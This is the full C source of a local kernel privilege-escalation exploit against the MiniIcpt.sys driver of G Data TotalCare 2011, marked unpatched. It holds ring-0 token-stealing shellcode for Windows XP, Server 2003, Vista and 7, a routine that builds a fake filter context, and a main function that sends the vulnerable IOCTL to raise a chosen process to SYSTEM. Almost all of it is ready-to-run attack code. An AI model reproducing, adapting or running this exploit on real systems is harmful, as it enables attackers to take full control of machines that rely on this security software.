G Data TotalCare 2011 0day Local Kernel Exploit
来源:CISS Research Team 作者:Tarakanov 发布时间:2010-11-09  

/*
# Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit
# Date: 2010-11-08
# Author: Nikita Tarakanov (CISS Research Team)
# Software Link: http://www.gdata.de/
# Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9
# Tested on: Win XP SP3
# CVE : CVE-NO-MATCH
# Status : Unpatched
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include "winsock2.h"
#include <windows.h>

#pragma comment(lib, "wininet.lib")
#pragma comment(lib, "Ws2_32.lib")


/*
 * Ring-0 payload, Windows Server 2003 x86.
 *
 * Walks the process list starting from the current process: first looks for
 * PID 4 (System), then for the target PID -- the imm32 of the second
 * `cmp ebx, imm32` (byte offset 58), which fixup_ring0_shell() overwrites --
 * and copies the 4-byte field at +0xd8 from the System entry into the target
 * entry. The offsets used (0x218 off the thread object; 0x94, 0x98 and 0xd8
 * off the process object) are presumably KTHREAD ApcState.Process and
 * EPROCESS UniqueProcessId / ActiveProcessLinks / Token for this OS build --
 * verify against symbols before reuse.
 *
 * If either search wraps around without a match the code falls into an int3
 * while in ring 0 (expect a bugcheck when no kernel debugger is attached).
 */
static unsigned char win2k3_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"       /* mov eax, 0xffdff124  ; presumably KPCR.PrcbData.CurrentThread */
  "\x8b\x00"                   /* mov eax, [eax]       ; current thread object */
  "\x8b\xb0\x18\x02\x00\x00"   /* mov esi, [eax+0x218] ; current process object (assumed) */
  "\x89\xf0"                   /* mov eax, esi         ; eax = list cursor, esi = start */
  /* _sys_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"   /* mov ebx, [eax+0x94]  ; PID of cursor */
  "\x81\xfb\x04\x00\x00\x00"   /* cmp ebx, 4           ; System process? */
  "\x74\x11"                   /* je  _sys_eprocess_found */
  "\x8b\x80\x9c\x00\x00\x00"   /* mov eax, [eax+0x9c]  ; Flink of the list entry at +0x98 */
  "\x2d\x98\x00\x00\x00"       /* sub eax, 0x98        ; back to the object base */
  "\x39\xf0"                   /* cmp eax, esi         ; wrapped around to the start? */
  "\x75\xe3"                   /* jne _sys_eprocess_loop */
  "\xeb\x21"                   /* jmp _not_found */
  /* _sys_eprocess_found  */
  "\x89\xc1"                   /* mov ecx, eax         ; ecx = System process */
  "\x89\xf0"                   /* mov eax, esi         ; restart the walk */

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x94\x00\x00\x00"   /* mov ebx, [eax+0x94] */
  "\x81\xfb\x00\x00\x00\x00"   /* cmp ebx, <target pid> ; imm32 patched at offset 58 */
  "\x74\x10"                   /* je  _cmd_eprocess_found */
  "\x8b\x80\x9c\x00\x00\x00"   /* mov eax, [eax+0x9c] */
  "\x2d\x98\x00\x00\x00"       /* sub eax, 0x98 */
  "\x39\xf0"                   /* cmp eax, esi */
  "\x75\xe3"                   /* jne _cmd_eprocess_loop */
  /* _not_found           */
  "\xcc"                       /* int3 */
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* token copy: target->+0xd8 = System->+0xd8 */
  "\x8b\x89\xd8\x00\x00\x00"   /* mov ecx, [ecx+0xd8] */
  "\x89\x88\xd8\x00\x00\x00"   /* mov [eax+0xd8], ecx */
  "\x90";                      /* nop ; main() appends the freeze loop right after this */

/*
 * Ring-0 payload, Windows Vista x86.
 *
 * Same algorithm as the other payloads: locate PID 4 (System) and the target
 * PID (imm32 at byte offset 54, patched by fixup_ring0_shell()) in the
 * process list, then copy the 4-byte field at +0xe0 from System into the
 * target. Offsets (0x48 off the thread object; 0x9c, 0xa0, 0xe0 off the
 * process object) are presumably KTHREAD ApcState.Process and EPROCESS
 * UniqueProcessId / ActiveProcessLinks / Token for Vista -- verify against
 * symbols before reuse.
 *
 * A miss in either search ends in an int3 at ring 0 (bugcheck unless a
 * kernel debugger is attached).
 */
static unsigned char winvista_ring0_shell[] =
  /* _ring0 */
  "\x64\xa1\x24\x01\x00\x00"   /* mov eax, fs:[0x124]  ; presumably KPCR.PrcbData.CurrentThread */
  /* (no extra [eax] load here: fs:[0x124] is presumably already the thread object) */
  "\x8b\x70\x48"               /* mov esi, [eax+0x48]  ; current process object (assumed) */
  "\x89\xf0"                   /* mov eax, esi         ; eax = list cursor, esi = start */
  /* _sys_eprocess_loop   */
  "\x8b\x98\x9c\x00\x00\x00"   /* mov ebx, [eax+0x9c]  ; PID of cursor */
  "\x81\xfb\x04\x00\x00\x00"   /* cmp ebx, 4           ; System process? */
  "\x74\x11"                   /* je  _sys_eprocess_found */
  "\x8b\x80\xa4\x00\x00\x00"   /* mov eax, [eax+0xa4]  ; Flink of the list entry at +0xa0 */
  "\x2d\xa0\x00\x00\x00"       /* sub eax, 0xa0        ; back to the object base */
  "\x39\xf0"                   /* cmp eax, esi         ; wrapped around? */
  "\x75\xe3"                   /* jne _sys_eprocess_loop */
  "\xeb\x21"                   /* jmp _not_found */
  /* _sys_eprocess_found  */
  "\x89\xc1"                   /* mov ecx, eax         ; ecx = System process */
  "\x89\xf0"                   /* mov eax, esi         ; restart the walk */

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x9c\x00\x00\x00"   /* mov ebx, [eax+0x9c] */
  "\x81\xfb\x00\x00\x00\x00"   /* cmp ebx, <target pid> ; imm32 patched at offset 54 */
  "\x74\x10"                   /* je  _cmd_eprocess_found */
  "\x8b\x80\xa4\x00\x00\x00"   /* mov eax, [eax+0xa4] */
  "\x2d\xa0\x00\x00\x00"       /* sub eax, 0xa0 */
  "\x39\xf0"                   /* cmp eax, esi */
  "\x75\xe3"                   /* jne _cmd_eprocess_loop */
  /* _not_found           */
  "\xcc"                       /* int3 */
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* token copy: target->+0xe0 = System->+0xe0 */
  "\x8b\x89\xe0\x00\x00\x00"   /* mov ecx, [ecx+0xe0] */
  "\x89\x88\xe0\x00\x00\x00"   /* mov [eax+0xe0], ecx */
  "\x90";                      /* nop ; main() appends the freeze loop right after this */


/*
 * Ring-0 payload, Windows 7 x86.
 *
 * Same algorithm as the other payloads: locate PID 4 (System) and the target
 * PID (imm32 at byte offset 54, patched by fixup_ring0_shell()) in the
 * process list, then copy the 4-byte field at +0xf8 from System into the
 * target. Offsets (0x50 off the thread object; 0xb4, 0xb8, 0xf8 off the
 * process object) are presumably KTHREAD ApcState.Process and EPROCESS
 * UniqueProcessId / ActiveProcessLinks / Token for Windows 7 -- verify
 * against symbols before reuse.
 *
 * A miss in either search ends in an int3 at ring 0 (bugcheck unless a
 * kernel debugger is attached).
 */
static unsigned char win7_ring0_shell[] =
  /* _ring0 */
  "\x64\xa1\x24\x01\x00\x00"   /* mov eax, fs:[0x124]  ; presumably KPCR.PrcbData.CurrentThread */
  "\x8b\x70\x50"               /* mov esi, [eax+0x50]  ; current process object (assumed) */
  "\x89\xf0"                   /* mov eax, esi         ; eax = list cursor, esi = start */
  /* _sys_eprocess_loop   */
  "\x8b\x98\xb4\x00\x00\x00"   /* mov ebx, [eax+0xb4]  ; PID of cursor */
  "\x81\xfb\x04\x00\x00\x00"   /* cmp ebx, 4           ; System process? */
  "\x74\x11"                   /* je  _sys_eprocess_found */
  "\x8b\x80\xbc\x00\x00\x00"   /* mov eax, [eax+0xbc]  ; Flink of the list entry at +0xb8 */
  "\x2d\xb8\x00\x00\x00"       /* sub eax, 0xb8        ; back to the object base */
  "\x39\xf0"                   /* cmp eax, esi         ; wrapped around? */
  "\x75\xe3"                   /* jne _sys_eprocess_loop */
  "\xeb\x21"                   /* jmp _not_found */
  /* _sys_eprocess_found  */
  "\x89\xc1"                   /* mov ecx, eax         ; ecx = System process */
  "\x89\xf0"                   /* mov eax, esi         ; restart the walk */

  /* _cmd_eprocess_loop   */
  "\x8b\x98\xb4\x00\x00\x00"   /* mov ebx, [eax+0xb4] */
  "\x81\xfb\x00\x00\x00\x00"   /* cmp ebx, <target pid> ; imm32 patched at offset 54 */
  "\x74\x10"                   /* je  _cmd_eprocess_found */
  "\x8b\x80\xbc\x00\x00\x00"   /* mov eax, [eax+0xbc] */
  "\x2d\xb8\x00\x00\x00"       /* sub eax, 0xb8 */
  "\x39\xf0"                   /* cmp eax, esi */
  "\x75\xe3"                   /* jne _cmd_eprocess_loop */
  /* _not_found           */
  "\xcc"                       /* int3 */
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* token copy: target->+0xf8 = System->+0xf8 */
  "\x8b\x89\xf8\x00\x00\x00"   /* mov ecx, [ecx+0xf8] */
  "\x89\x88\xf8\x00\x00\x00"   /* mov [eax+0xf8], ecx */
  "\x90";                      /* nop ; main() appends the freeze loop right after this */


/*
 * Ring-0 payload, Windows XP x86 (the only configuration listed as tested).
 *
 * Same algorithm as the other payloads: locate PID 4 (System) and the target
 * PID (imm32 at byte offset 55, patched by fixup_ring0_shell()) in the
 * process list, then copy the 4-byte field at +0xc8 from System into the
 * target. Offsets (0x44 off the thread object; 0x84, 0x88, 0xc8 off the
 * process object) are presumably KTHREAD ApcState.Process and EPROCESS
 * UniqueProcessId / ActiveProcessLinks / Token for XP -- verify against
 * symbols before reuse.
 *
 * A miss in either search ends in an int3 at ring 0 (bugcheck unless a
 * kernel debugger is attached).
 */
static unsigned char winxp_ring0_shell[] =
  /* _ring0 */
  "\xb8\x24\xf1\xdf\xff"       /* mov eax, 0xffdff124  ; presumably KPCR.PrcbData.CurrentThread */
  "\x8b\x00"                   /* mov eax, [eax]       ; current thread object */
  "\x8b\x70\x44"               /* mov esi, [eax+0x44]  ; current process object (assumed) */
  "\x89\xf0"                   /* mov eax, esi         ; eax = list cursor, esi = start */
  /* _sys_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"   /* mov ebx, [eax+0x84]  ; PID of cursor */
  "\x81\xfb\x04\x00\x00\x00"   /* cmp ebx, 4           ; System process? */
  "\x74\x11"                   /* je  _sys_eprocess_found */
  "\x8b\x80\x8c\x00\x00\x00"   /* mov eax, [eax+0x8c]  ; Flink of the list entry at +0x88 */
  "\x2d\x88\x00\x00\x00"       /* sub eax, 0x88        ; back to the object base */
  "\x39\xf0"                   /* cmp eax, esi         ; wrapped around? */
  "\x75\xe3"                   /* jne _sys_eprocess_loop */
  "\xeb\x21"                   /* jmp _not_found */
  /* _sys_eprocess_found  */
  "\x89\xc1"                   /* mov ecx, eax         ; ecx = System process */
  "\x89\xf0"                   /* mov eax, esi         ; restart the walk */

  /* _cmd_eprocess_loop   */
  "\x8b\x98\x84\x00\x00\x00"   /* mov ebx, [eax+0x84] */
  "\x81\xfb\x00\x00\x00\x00"   /* cmp ebx, <target pid> ; imm32 patched at offset 55 */
  "\x74\x10"                   /* je  _cmd_eprocess_found */
  "\x8b\x80\x8c\x00\x00\x00"   /* mov eax, [eax+0x8c] */
  "\x2d\x88\x00\x00\x00"       /* sub eax, 0x88 */
  "\x39\xf0"                   /* cmp eax, esi */
  "\x75\xe3"                   /* jne _cmd_eprocess_loop */
  /* _not_found           */
  "\xcc"                       /* int3 */
  /* _cmd_eprocess_found
   * _ring0_end           */

  /* token copy: target->+0xc8 = System->+0xc8 */
  "\x8b\x89\xc8\x00\x00\x00"   /* mov ecx, [ecx+0xc8] */
  "\x89\x88\xc8\x00\x00\x00"   /* mov [eax+0xc8], ecx */
  "\x90";                      /* nop ; main() appends the freeze loop right after this */


/*
 * Spin loop that main() appends directly after the selected ring-0 payload.
 * Once the token copy is done the kernel thread parks here forever instead of
 * returning into the driver, so the process that issued the IOCTL never comes
 * back from DeviceIoControl (and one CPU stays busy at ring 0).
 */
static unsigned char freeze[] =
  "\xeb\xfe";// jmp $ (jump to self)

 

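/*
 * Build the fake filter-context the vulnerable IOCTL handler walks.
 *
 * buff points 0x40 bytes into a caller-owned scratch buffer (see main), so
 * the two writes at negative offsets stay inside that allocation:
 *   buff-0x04 : a reference count of 1
 *   buff-0x28 : pointer to a heap Entry whose slot 0 points at Entry itself
 *               and whose slot 1 holds the ring-0 payload address (the
 *               driver is assumed to load Entry into esi and call through
 *               [esi+4] -- inferred from the original annotations, verify
 *               against the handler).
 *
 * Entry is deliberately never freed: the kernel dereferences it during the
 * DeviceIoControl call in main, so it has to stay live until the process
 * exits. Pointers are squeezed into 32-bit slots, so this only works from a
 * 32-bit process -- which the x86 payloads require anyway.
 *
 * buff           : address inside the IOCTL input buffer with at least 0x28
 *                  bytes of headroom before it
 * shellcode_addr : user-mode address of the ring-0 payload
 * Exits the process if the heap allocation fails (the original would have
 * written through a NULL Entry).
 */
void craft_fake_flt_context(char* buff, LPVOID shellcode_addr)
{
 DWORD references = 1;
 DWORD *Entry;

 Entry = (DWORD*)malloc(2 * sizeof *Entry);
 if (Entry == NULL)
 {
  printf("malloc failed!\n");
  exit(EXIT_FAILURE);
 }

 /* Explicit pointer->DWORD casts; the original relied on an implicit
  * pointer-to-integer conversion that newer compilers reject. */
 Entry[0] = (DWORD)(DWORD_PTR)Entry;           /* Entry[0] == esi         */
 Entry[1] = (DWORD)(DWORD_PTR)shellcode_addr;  /* [esi+4] -> r0 shellcode */

 memcpy(buff - 0x4, &references, sizeof references);
 memcpy(buff - 0x28, &Entry[0], sizeof Entry[0]);  /* store &Entry (32-bit) */
}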

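/*
 * Patch the target PID into one payload and report its length.
 *
 * pid_off is the byte offset of the imm32 of the payload's second
 * `cmp ebx, imm32`. The two bytes before it must be that instruction's
 * opcode (81 fb); this is checked so that an edited payload can never be
 * patched at a stale offset and silently compare against the wrong PID.
 *
 * shell      : one of the static payload arrays (patched in place)
 * shell_size : sizeof that array (payload bytes + trailing NUL)
 * pid_off    : offset of the 4-byte PID slot
 * ppid       : PID to write (copied as the host's native DWORD bytes, which
 *              on this x86 target is the little-endian immediate)
 * zlen       : out, payload length excluding the NUL
 * Returns shell; exits the process on a layout mismatch.
 */
static PCHAR patch_target_pid(unsigned char *shell, size_t shell_size,
                              size_t pid_off, DWORD ppid, DWORD *zlen)
{
 size_t payload_len = shell_size - 1;

 if (pid_off < 2 || pid_off + sizeof ppid > payload_len ||
     shell[pid_off - 2] != 0x81 || shell[pid_off - 1] != 0xfb)
 {
  printf("payload layout mismatch at offset %lu, refusing to patch\n",
         (unsigned long)pid_off);
  exit(EXIT_FAILURE);
 }

 /* memcpy instead of a PDWORD store: the slot is not 4-byte aligned. */
 memcpy(&shell[pid_off], &ppid, sizeof ppid);
 *zlen = (DWORD)payload_len;
 return (PCHAR)shell;
}

/*
 * Select the ring-0 payload for the running OS and patch the target PID
 * into it.
 *
 * One payload per OS because the thread/process structure offsets differ
 * (see the payload headers). The arrays are patched in place, so this is
 * not reentrant and a second call with another PID overwrites the first.
 * GetVersion() is deprecated and, on Windows 8.1 and later, is documented
 * to report no more than 6.2, so anything newer than Windows 7 lands in
 * the unsupported branch rather than selecting a wrong payload.
 *
 * ppid : PID of the process to elevate
 * zlen : out, payload length in bytes (excluding the NUL terminator)
 * Returns a pointer to the static payload; exits the process on an
 * unsupported OS version or a payload layout mismatch.
 */
static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
 DWORD dwVersion = GetVersion ();
 DWORD dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
 DWORD dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

 /* %lu with explicit casts: DWORD is unsigned long on Windows, the original
  * %d was a format/argument mismatch. */
 printf("dwMajorVersion = %lu dwMinorVersion %lu\n",
        (unsigned long)dwMajorVersion, (unsigned long)dwMinorVersion);

 if (dwMajorVersion == 5 && dwMinorVersion == 1)   /* Windows XP */
  return patch_target_pid(winxp_ring0_shell, sizeof winxp_ring0_shell, 55, ppid, zlen);
 if (dwMajorVersion == 5 && dwMinorVersion == 2)   /* Windows Server 2003 */
  return patch_target_pid(win2k3_ring0_shell, sizeof win2k3_ring0_shell, 58, ppid, zlen);
 if (dwMajorVersion == 6 && dwMinorVersion == 0)   /* Windows Vista */
  return patch_target_pid(winvista_ring0_shell, sizeof winvista_ring0_shell, 54, ppid, zlen);
 if (dwMajorVersion == 6 && dwMinorVersion == 1)   /* Windows 7 */
  return patch_target_pid(win7_ring0_shell, sizeof win7_ring0_shell, 54, ppid, zlen);

 printf("GetVersion, unsupported version\n");
 exit(EXIT_FAILURE);
}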


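/*
 * Entry point: elevate the process whose PID is given on the command line.
 *
 * Flow:
 *   1. Pick the ring-0 payload for this OS and patch the target PID into it
 *      (fixup_ring0_shell), copy it into an RWX page and append the freeze
 *      spin loop so the kernel thread never returns to the driver.
 *   2. Open \\.\MiniIcptControlDevice0 and send IOCTL 0x83170180 with an
 *      input buffer whose first DWORD points at a fake filter context built
 *      by craft_fake_flt_context(); the driver is assumed to follow that
 *      pointer and end up calling into the user-mode page.
 *
 * Because the payload ends in `jmp $`, a successful trigger is not expected
 * to return from DeviceIoControl; reaching the code after it most likely
 * means the driver did not take the vulnerable path. 32-bit process only:
 * the payloads are x86 and user-mode pointers are stored in DWORDs.
 *
 * Returns 0 on success (or after printing usage), 1 on any failure.
 */
int main(int argc, char **argv)
{
 HANDLE hDevice;
 char *inbuff, *inbuffer, *end;
 DWORD *buff;
 DWORD ioctl = 0x83170180, in = 0xC, out = 0x0C, len = 0, zlen, ppid;
 unsigned long pid;
 LPVOID zpage, zbuf;
 BOOL ok;

 printf ("G Data TotalCare 2011 0day Local Kernel Exploit\n"
    "by: Nikita Tarakanov (CISS Research Team)\n");

 if (argc <= 1)
 {
  printf("Usage: %s <processid to elevate>\n", argv[0]);
  return 0;
 }

 /* strtoul instead of atoi: reject junk and PID 0 explicitly rather than
  * silently patching 0 into the payload's search loop. */
 errno = 0;
 pid = strtoul(argv[1], &end, 10);
 if (end == argv[1] || *end != '\0' || errno == ERANGE || pid == 0)
 {
  printf("Error: invalid process id '%s'\n", argv[1]);
  return 1;
 }
 ppid = (DWORD)pid;

 zpage = VirtualAlloc(NULL, 0x1000, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 if (zpage == NULL)
 {
  printf("VirtualAlloc failed\n");
  return 1;
 }
 /* %p for the pointer; the original passed a stray extra argument to %08X. */
 printf("Ring 0 shellcode at %p address\n", zpage);

 /* Pre-fill with int3 so a wrong jump target traps instead of running junk. */
 memset(zpage, 0xCC, 0x1000);
 zbuf = fixup_ring0_shell(ppid, &zlen);
 if (zlen + (sizeof freeze - 1) > 0x1000)
 {
  printf("payload does not fit in the allocated page\n");
  VirtualFree(zpage, 0, MEM_RELEASE);
  return 1;
 }
 memcpy((PCHAR)zpage, (PCHAR)zbuf, zlen);
 memcpy((PCHAR)zpage + zlen, (PCHAR)freeze, sizeof (freeze) - 1);

 hDevice = CreateFileA("\\\\.\\MiniIcptControlDevice0",
        GENERIC_READ|GENERIC_WRITE,
        0,
        0,
        OPEN_EXISTING,
        0,
        NULL);
 if (hDevice == INVALID_HANDLE_VALUE)
 {
  printf("Error: Error opening device (GetLastError=%lu)\n",
         (unsigned long)GetLastError());
  VirtualFree(zpage, 0, MEM_RELEASE);
  return 1;
 }
 printf("Device succesfully opened!\n");

 /* Check both heap buffers before touching them; buff is zeroed so no
  * uninitialized bytes are handed to the driver. */
 inbuff = (char *)malloc(0x1000);
 buff = (DWORD *)malloc(0x1000);
 if (!inbuff || !buff)
 {
  printf("malloc failed!\n");
  free(inbuff);
  free(buff);
  CloseHandle(hDevice);
  VirtualFree(zpage, 0, MEM_RELEASE);
  return 1;
 }
 memset(inbuff, 0x90, 0x1000);
 memset(buff, 0, 0x1000);

 /* 0x40 bytes of headroom: craft_fake_flt_context writes at buff-0x4 and
  * buff-0x28 relative to the pointer it is given. */
 inbuffer = inbuff + 0x40;
 printf("crafting\n");
 craft_fake_flt_context(inbuffer, zpage);
 printf("deviceio!\n");
 buff[0] = (DWORD)(DWORD_PTR)inbuffer;

 /* On success this call is not expected to return (payload spins at ring 0);
  * a FALSE result means the driver rejected or did not reach the trigger. */
 ok = DeviceIoControl(hDevice, ioctl, buff, in, buff, out, &len, NULL);
 if (!ok)
 {
  printf("DeviceIoControl failed (GetLastError=%lu)\n",
         (unsigned long)GetLastError());
 }

 free(inbuff);
 free(buff);
 CloseHandle(hDevice);
 VirtualFree(zpage, 0, MEM_RELEASE);

 return ok ? 0 : 1;
}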


 